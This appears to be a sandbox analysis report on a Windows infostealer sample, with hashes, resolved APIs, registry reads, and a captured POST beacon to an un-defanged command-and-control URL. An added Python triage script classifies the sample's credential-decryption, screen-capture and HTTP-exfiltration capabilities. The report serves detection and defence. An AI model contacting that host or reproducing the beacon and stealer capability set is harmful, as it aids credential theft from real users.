MalScore
100/100

soft1.exe

Flags: Is DLL / Packer / Anti Debug / Anti VM / Signed / XOR    AntiVirus: 42/70    Related: 2164
File details
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 856.00 KB (876544 bytes)
Compile time: 1979-03-21 01:30:46 (invalid: predates the PE format, so the header TimeDateStamp has been overwritten and cannot be used to date the build)
MD5: 0ef724276b3aa26af86f5d8dec90ba17
SHA1: 6f3cc71f37eb73efebf692ed81a99ed99f0951bf
SHA256: 5c8a00f19dace48b0e1575c9def40afc45dfdd0c81aec27e99c133304aa14075
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744 (the generic value shared by .NET executables whose only native import is mscoree!_CorExeMain; not useful for clustering)
Sections: 4 (.text, .sdata, .rsrc, .reloc)
Directories: 3 (import, resource, relocation)
Anti Virtual Machine: 1 (VirtualBox)
First submission: 2018-11-30 15:54:05
Last submission: 2018-11-30 15:54:05
Filename detected: soft1.exe (1)
URL file hosting
hXXp://bonheur-salon.net/soft/soft1.exe
Antivirus Report
Report date: 2018-11-29 21:54:52    Detection ratio: 42/70    Source: VirusTotal
PE Sections (2 flagged suspicious)
Name    VAddress    VSize    RawSize (bytes)    MD5    SHA1
.text 0x2000 0xbb754 768000 a0f96ea76dd09f6d7d81151effd0ea7e 0527e7693717480fbce609e41da3e14dccd9f4af
.sdata 0xbe000 0x19806 104960 1ec9fed92708a54d582901e96bc84e4f 6cdd282c5fb6abe936fe23598ee77fbeb7896906
.rsrc 0xd8000 0x620 2048 9361fee687fc8e9f183312fd239494c3 b9613d56754d29151d3f2f9afcd688847c163c8e
.reloc 0xda000 0xc 512 306983d855756bd858313986f51ce943 7c99468716ce44fd838a8a888addbaeefa1554d1
Meta Info
No Meta found in this file
XOR
No XOR information found in this file.
Signature
This file isn't digitally signed
Packer(s)
(compiler and toolchain signatures only; no packer was identified)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
File type: XML
System.Xml
File type: Library
clrjit.dll
USER32.dll
UxTheme.dll
mscoree.dll
GDI32.dll
KERNEL32.dll
IP Found
1.12.19.3 (string match only; the pattern also fits a four-part version number, and no connection to this address was observed during analysis)
URL(s)
file:/// (bare scheme prefix, no host)
Behavior analysis details
Machine: Seven05b_64 (label Seven05b_64, manager VirtualBox)    Started: 2018-11-30 15:45:35    Ended: 2018-11-30 15:48:33    Duration: 178 s

7 Behaviors detected by system signatures


6 Summary items with data

Files

C:\Users\Seven01\AppData\Local\Temp\soft1.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
\Device\KsecDD

Read Files

C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
\Device\KsecDD

Write Files

Nothing to display

Delete Files

Nothing to display

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ProductName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ProductName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

A606D0EC7-72D679BB-0A5DF8A0-1A37A0DE-63BCCAB3

Resolved APIs

crypt32.dll.CryptUnprotectData
crtdll.dll.wcscmp
gdiplus.dll.GdiplusStartup
gdiplus.dll.GdiplusShutdown
gdiplus.dll.GdipCreateBitmapFromHBITMAP
gdiplus.dll.GdipGetImageEncodersSize
gdiplus.dll.GdipGetImageEncoders
gdiplus.dll.GdipDisposeImage
gdiplus.dll.GdipSaveImageToStream
ole32.dll.CreateStreamOnHGlobal
ole32.dll.GetHGlobalFromStream
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.GetComputerNameW
kernel32.dll.GlobalMemoryStatus
kernel32.dll.CreateFileW
kernel32.dll.GetFileSize
kernel32.dll.CloseHandle
kernel32.dll.ReadFile
kernel32.dll.GetFileAttributesW
kernel32.dll.CreateMutexA
kernel32.dll.ReleaseMutex
kernel32.dll.GetLastError
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.SetEnvironmentVariableW
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SetCurrentDirectoryW
kernel32.dll.FindFirstFileW
kernel32.dll.FindNextFileW
kernel32.dll.LocalFree
kernel32.dll.GetTickCount
kernel32.dll.CopyFileW
kernel32.dll.FindClose
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Process32FirstW
kernel32.dll.Process32NextW
kernel32.dll.GetModuleFileNameW
kernel32.dll.SetDllDirectoryW
kernel32.dll.GetLocaleInfoA
kernel32.dll.GetLocalTime
kernel32.dll.GetTimeZoneInformation
kernel32.dll.RemoveDirectoryW
kernel32.dll.DeleteFileW
kernel32.dll.GetLogicalDriveStringsA
kernel32.dll.GetDriveTypeA
kernel32.dll.CreateProcessW
advapi32.dll.GetUserNameW
advapi32.dll.RegCreateKeyExW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegCloseKey
advapi32.dll.RegOpenKeyExW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.LookupAccountSidA
advapi32.dll.CreateProcessAsUserW
advapi32.dll.CheckTokenMembership
advapi32.dll.RegOpenKeyW
advapi32.dll.RegEnumKeyW
advapi32.dll.RegEnumValueW
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptCreateHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptReleaseContext
user32.dll.EnumDisplayDevicesW
user32.dll.wvsprintfA
user32.dll.GetKeyboardLayoutList
shell32.dll.ShellExecuteExW
ntdll.dll.RtlComputeCrc32
sechost.dll.LookupAccountSidLocalA
wininet.dll.InternetOpenA
wininet.dll.InternetConnectA
wininet.dll.HttpOpenRequestA
wininet.dll.HttpAddRequestHeadersA
wininet.dll.HttpSendRequestA
wininet.dll.InternetReadFile
wininet.dll.InternetCloseHandle
wininet.dll.InternetCrackUrlA
wininet.dll.InternetSetOptionA
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
cryptbase.dll.SystemFunction036
rpcrt4.dll.RpcBindingFree

Execute Commands

Nothing to display

Started Services

Nothing to display

Created Services

Nothing to display
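The static import table above lists only the .NET runtime stub (mscoree.dll) and a handful of GUI libraries, while the APIs resolved at run time are native Win32 calls for screen capture (GDI+ bitmap to stream), DPAPI decryption (CryptUnprotectData), host fingerprinting (computer name, user name, MachineGuid, display devices, keyboard layouts, memory), process and file enumeration, a mutex, and WinINet HTTP. That gap is consistent with the managed wrapper handing off to native code in memory, though the report does not show the hand-off itself. The script below is an added example, not the sandbox's own signature logic: it turns the resolved-API, registry, mutex and service evidence transcribed from this report into capability findings using conjunctive rules. The rule names, the token scheme ("reg:", "mutex:", "service:") and the "infostealer-like" label are the author's own heuristics, and only the subset of the report's evidence the rules need is transcribed.

```python
"""Added capability triage over this report's resolved-API, registry, mutex and service evidence.
Rules, tokens and labels are the author's own, not the sandbox's signatures."""

# Evidence transcribed from the report's behaviour summary (subset sufficient for the rules).
RESOLVED_APIS = [
    "crypt32.dll.CryptUnprotectData",
    "gdiplus.dll.GdipCreateBitmapFromHBITMAP", "gdiplus.dll.GdipSaveImageToStream",
    "ole32.dll.CreateStreamOnHGlobal",
    "kernel32.dll.GetComputerNameW", "advapi32.dll.GetUserNameW",
    "user32.dll.EnumDisplayDevicesW", "user32.dll.GetKeyboardLayoutList",
    "kernel32.dll.CreateToolhelp32Snapshot", "kernel32.dll.Process32FirstW",
    "kernel32.dll.FindFirstFileW", "kernel32.dll.CopyFileW",
    "kernel32.dll.CreateMutexA",
    "wininet.dll.InternetOpenA", "wininet.dll.HttpSendRequestA", "wininet.dll.InternetReadFile",
    "kernel32.dll.DeleteFileW", "kernel32.dll.RemoveDirectoryW",
]
READ_KEYS = [
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ProductName",
]
MUTEXES = ["A606D0EC7-72D679BB-0A5DF8A0-1A37A0DE-63BCCAB3"]
CREATED_SERVICES = []  # report: "Nothing to display"

# A capability fires only when every token in its set is present.
# Token forms: "dll.Export", "reg:<value name>", "mutex:created", "service:created".
RULES = {
    "screen-capture": {"gdiplus.dll.GdipCreateBitmapFromHBITMAP",
                       "gdiplus.dll.GdipSaveImageToStream", "ole32.dll.CreateStreamOnHGlobal"},
    "dpapi-credential-decrypt": {"crypt32.dll.CryptUnprotectData"},
    "host-fingerprint": {"kernel32.dll.GetComputerNameW", "advapi32.dll.GetUserNameW",
                         "user32.dll.EnumDisplayDevicesW", "reg:MachineGuid"},
    "process-enumeration": {"kernel32.dll.CreateToolhelp32Snapshot", "kernel32.dll.Process32FirstW"},
    "file-discovery-and-staging": {"kernel32.dll.FindFirstFileW", "kernel32.dll.CopyFileW"},
    "single-instance-mutex": {"kernel32.dll.CreateMutexA", "mutex:created"},
    "http-c2": {"wininet.dll.InternetOpenA", "wininet.dll.HttpSendRequestA",
                "wininet.dll.InternetReadFile"},
    "self-cleanup": {"kernel32.dll.DeleteFileW", "kernel32.dll.RemoveDirectoryW"},
    "service-persistence": {"service:created"},  # absent here; kept to show a non-firing rule
}


def build_evidence(apis, read_keys, mutexes, services) -> set:
    """Normalise the report's four evidence lists into one token set."""
    tokens = set(apis)
    # Registry evidence is keyed on the leaf value name, e.g. "reg:MachineGuid".
    tokens |= {"reg:" + key.rsplit("\\", 1)[-1] for key in read_keys}
    if mutexes:
        tokens.add("mutex:created")
    if services:
        tokens.add("service:created")
    return tokens


def match_capabilities(tokens: set, rules=RULES) -> dict:
    """Return {capability: missing tokens}; an empty missing set means the rule fired."""
    return {name: needed - tokens for name, needed in rules.items()}


def fired_capabilities(result: dict) -> list:
    return sorted(name for name, missing in result.items() if not missing)


def classify(fired: list) -> str:
    """Author's heuristic: credential decryption plus screen capture plus HTTP C2 reads as a stealer."""
    if {"dpapi-credential-decrypt", "screen-capture", "http-c2"} <= set(fired):
        return "infostealer-like"
    return "inconclusive"


if __name__ == "__main__":
    evidence = build_evidence(RESOLVED_APIS, READ_KEYS, MUTEXES, CREATED_SERVICES)
    result = match_capabilities(evidence)
    fired = fired_capabilities(result)
    print(classify(fired), fired)
    for name, missing in result.items():
        if missing:
            print(f"not fired: {name} (missing {sorted(missing)})")
```

Rules are conjunctive on purpose: a single GDI+ call or a lone InternetOpenA is normal in benign software, and only the combination (bitmap captured, serialised to a stream, posted over WinINet, alongside DPAPI decryption) carries signal. The absent service-persistence rule documents what the sandbox did not see as explicitly as what it did.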

1 HTTP Request(s) detected

http://uspool.softopia.site/vvv/index.php
  • Hostname: uspool.softopia.site
  • IP Address: 0.0.0.0 (hostname not resolved during analysis)
  • Port: 80
  • Count: 1

POST /vvv/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: uspool.softopia.site
Content-Length: 97
Cache-Control: no-cache

\x00\x00\x00&f\x98&f\x9e&f\x98Gp\x9d3\x10\xed&f\x99&g\xea&f\x99&f\x9cGp\x9d5p\x9d4p\x9d:\x17\xec&g\xea&f\x9eBp\x9d6\x11\xe8&f\x96Bp\x9d3p\x9cGp\x9d2\x14\x8b0f\x8b0b\xef&f\x9eG\x10\x8b1\x11\x8b0c\x8b0f\xec@\x16\xefAp\x9d0


TheSystem Itself @ 2018-11-30 15:54:27